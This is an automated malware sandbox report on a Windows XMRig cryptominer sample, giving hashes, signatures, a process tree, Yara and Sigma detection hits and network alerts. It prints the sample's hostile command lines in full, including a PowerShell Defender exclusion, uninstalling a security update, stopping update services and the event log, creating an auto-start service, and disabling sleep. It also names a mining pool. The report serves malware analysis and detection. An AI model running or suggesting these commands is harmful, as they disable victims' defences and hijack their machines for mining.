Windows Analysis Report
lokigod.exe

Overview

General Information

Sample name: lokigod.exe
Analysis ID: 1568489
MD5: 769ea3d0e0cf22eaa7526a89c0f438cf
SHA1: 5221042ad60744e2bdcf8319ff00bdbfc253eb59
SHA256: b369c94a835882a2267ff0a7a4ebb9a91621c3f134f63010d491121a7827b448
Tags: exe, user-aachum

Detection

Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Disable power options
Sigma detected: Stop EventLog
Yara detected Xmrig cryptocurrency miner
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found strings related to Crypto-Mining
Loading BitLocker PowerShell Module
Modifies power options to not sleep / hibernate
Modifies the context of a thread in another process (thread injection)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Suspect Svchost Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Uses powercfg.exe to modify the power settings
AV process strings found (often used to terminate AV products)
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Powershell Defender Exclusion
Sigma detected: Uncommon Svchost Parent Process
Suricata IDS alerts with low severity for network traffic
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • lokigod.exe (PID: 7320 cmdline: "C:\Users\user\Desktop\lokigod.exe" MD5: 769EA3D0E0CF22EAA7526A89C0F438CF)
    • powershell.exe (PID: 7348 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 7376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 7612 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7628 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 7708 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7620 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7636 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7724 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7732 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7772 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7780 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7820 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7828 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7868 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7908 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7924 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7916 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7940 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7932 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7948 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 8004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7976 cmdline: C:\Windows\system32\sc.exe delete "LBFXRZGB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8116 cmdline: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8168 cmdline: C:\Windows\system32\sc.exe stop eventlog MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 8184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 8176 cmdline: C:\Windows\system32\sc.exe start "LBFXRZGB" MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6512 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • vzppfnnlsyit.exe (PID: 5268 cmdline: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe MD5: 769EA3D0E0CF22EAA7526A89C0F438CF)
    • powershell.exe (PID: 5780 cmdline: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 5540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 2452 cmdline: C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 6504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • wusa.exe (PID: 4268 cmdline: wusa /uninstall /kb:890830 /quiet /norestart MD5: FBDA2B8987895780375FE0E6254F6198)
    • sc.exe (PID: 7276 cmdline: C:\Windows\system32\sc.exe stop UsoSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 6500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 7312 cmdline: C:\Windows\system32\sc.exe stop WaaSMedicSvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 5612 cmdline: C:\Windows\system32\sc.exe stop wuauserv MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 2072 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 6448 cmdline: C:\Windows\system32\sc.exe stop bits MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • sc.exe (PID: 4676 cmdline: C:\Windows\system32\sc.exe stop dosvc MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
      • conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7488 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7472 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7492 cmdline: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7508 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powercfg.exe (PID: 7544 cmdline: C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0 MD5: 9CA38BE255FFF57A92BD6FBF8052B705)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • conhost.exe (PID: 7604 cmdline: C:\Windows\system32\conhost.exe MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • svchost.exe (PID: 7636 cmdline: svchost.exe MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
Name: xmrig
Description: According to PCrisk, XMRIG is a completely legitimate open-source application that utilizes system CPUs to mine Monero cryptocurrency. Unfortunately, criminals generate revenue by infiltrating this app into systems without users' consent. This deceptive marketing method is called "bundling". In most cases, "bundling" is used to infiltrate several potentially unwanted programs (PUAs) at once. So, there is a high probability that XMRIG Virus came with a number of adware-type applications that deliver intrusive ads and gather sensitive information.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.xmrig
No configs have been found
Source | Rule | Description | Author | Strings
sslproxydump.pcap | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security

Source | Rule | Description | Author | Strings
0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37eb98:$a1: mining.set_target
  • 0x370e20:$a2: XMRIG_HOSTNAME
  • 0x373748:$a3: Usage: xmrig [OPTIONS]
  • 0x370df8:$a4: XMRIG_VERSION
Process Memory Space: svchost.exe PID: 7636 | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
Process Memory Space: svchost.exe PID: 7636 | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x614d7:$a1: mining.set_target
  • 0x5dc80:$a2: XMRIG_HOSTNAME
  • 0x5e9f8:$a3: Usage: xmrig [OPTIONS]
  • 0x5dc61:$a4: XMRIG_VERSION

Source | Rule | Description | Author | Strings
59.2.svchost.exe.140000000.0.unpack | JoeSecurity_Xmrig | Yara detected Xmrig cryptocurrency miner | Joe Security
59.2.svchost.exe.140000000.0.unpack | MacOS_Cryptominer_Xmrig_241780a1 | unknown | unknown
  • 0x37ef98:$a1: mining.set_target
  • 0x371220:$a2: XMRIG_HOSTNAME
  • 0x373b48:$a3: Usage: xmrig [OPTIONS]
  • 0x3711f8:$a4: XMRIG_VERSION
59.2.svchost.exe.140000000.0.unpack | MAL_XMR_Miner_May19_1 | Detects Monero Crypto Coin Miner | Florian Roth
  • 0x3c8ee1:$x2: * COMMANDS 'h' hashrate, 'p' pause, 'r' resume
59.2.svchost.exe.140000000.0.unpack | MALWARE_Win_CoinMiner02 | Detects coinmining malware | ditekSHen
  • 0x3c9748:$s1: %s/%s (Windows NT %lu.%lu
  • 0x3cd180:$s3: \\.\WinRing0_
  • 0x376148:$s4: pool_wallet
  • 0x3705f0:$s5: cryptonight
  • 0x370600:$s5: cryptonight
  • 0x370610:$s5: cryptonight
  • 0x370620:$s5: cryptonight
  • 0x370638:$s5: cryptonight
  • 0x370648:$s5: cryptonight
  • 0x370658:$s5: cryptonight
  • 0x370670:$s5: cryptonight
  • 0x370680:$s5: cryptonight
  • 0x370698:$s5: cryptonight
  • 0x3706b0:$s5: cryptonight
  • 0x3706c0:$s5: cryptonight
  • 0x3706d0:$s5: cryptonight
  • 0x3706e0:$s5: cryptonight
  • 0x3706f8:$s5: cryptonight
  • 0x370710:$s5: cryptonight
  • 0x370720:$s5: cryptonight
  • 0x370730:$s5: cryptonight

Change of critical system settings

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, CommandLine|base64offset|contains: , Image: C:\Windows\System32\powercfg.exe, NewProcessName: C:\Windows\System32\powercfg.exe, OriginalFileName: C:\Windows\System32\powercfg.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0, ProcessId: 7908, ProcessName: powercfg.exe

System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7348, ProcessName: powershell.exe
Source: Process started | Author: David Burkett, @signalblur | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentImage: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentProcessId: 5268, ParentProcessName: vzppfnnlsyit.exe, ProcessCommandLine: svchost.exe, ProcessId: 7636, ProcessName: svchost.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7348, ProcessName: powershell.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentImage: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentProcessId: 5268, ParentProcessName: vzppfnnlsyit.exe, ProcessCommandLine: svchost.exe, ProcessId: 7636, ProcessName: svchost.exe
Source: Process started | Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community | Data: Command: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "LBFXRZGB" binpath= "C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe" start= "auto", ProcessId: 8116, ProcessName: sc.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force, ProcessId: 7348, ProcessName: powershell.exe
Source: Process started | Author: vburov | Data: Command: svchost.exe, CommandLine: svchost.exe, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentImage: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe, ParentProcessId: 5268, ParentProcessName: vzppfnnlsyit.exe, ProcessCommandLine: svchost.exe, ProcessId: 7636, ProcessName: svchost.exe

HIPS / PFW / Operating System Protection Evasion

Source: Process started | Author: Joe Security | Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user\Desktop\lokigod.exe", ParentImage: C:\Users\user\Desktop\lokigod.exe, ParentProcessId: 7320, ParentProcessName: lokigod.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 8168, ProcessName: sc.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-04T17:05:08.732115+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 51172 | 1.1.1.1 | 53 | UDP
2024-12-04T17:05:09.724782+0100 | 2036289 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 51172 | 1.1.1.1 | 53 | UDP
2024-12-04T17:05:12.220760+0100 | 2826930 | 2 | Crypto Currency Mining Activity Detected | 192.168.2.5 | 49704 | 37.203.243.102 | 443 | TCP

AV Detection

Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | ReversingLabs: Detection: 76%
Source: lokigod.exe | ReversingLabs: Detection: 76%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability

Bitcoin Miner

Source: Yara match | File source: sslproxydump.pcap, type: PCAP
Source: Yara match | File source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: svchost.exe PID: 7636, type: MEMORYSTR
Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: svchost.exe | String found in binary or memory: cryptonight-monerov7
Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: -o, --url=URL URL of mining server
Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: stratum+tcp://
Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: lokigod.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb | source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp
Source: Network traffic | Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.5:51172 -> 1.1.1.1:53
Source: Network traffic | Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.5:49704 -> 37.203.243.102:443
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: pool.hashvault.pro
Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: vzppfnnlsyit.exe, 00000022.00000003.2161528296.000001CEAE950000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: svchost.exe, 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp | String found in binary or memory: https://xmrig.com/docs/algorithms
Source: unknown | Network traffic detected: HTTP traffic on port 49704 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49704

System Summary

Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects coinmining malware Author: ditekSHen
Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: svchost.exe PID: 7636, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\Desktop\lokigod.exe | Process created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
Source: C:\Windows\System32\conhost.exe | Code function: 56_2_0000000140001394 NtFilterToken, 56_2_0000000140001394
Source: C:\ProgramData\spvpfblnegdb\vzppfnnlsyit.exe | File created: C:\Windows\TEMP\gdtmkvyhysuy.sys
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File deleted: C:\Windows\Temp\__PSScriptPolicyTest_fd2v2404.w5x.ps1
Source: C:\Windows\System32\conhost.exe | Code function: 56_2_0000000140003240, 56_2_0000000140003240
Source: C:\Windows\System32\conhost.exe | Code function: 56_2_00000001400027D0, 56_2_00000001400027D0
Source: Joe Sandbox View | Dropped File: C:\Windows\Temp\gdtmkvyhysuy.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
Source: 59.2.svchost.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
Source: 0000003B.00000002.3311685966.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
Source: Process Memory Space: svchost.exe PID: 7636, type: MEMORYSTR | Matched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
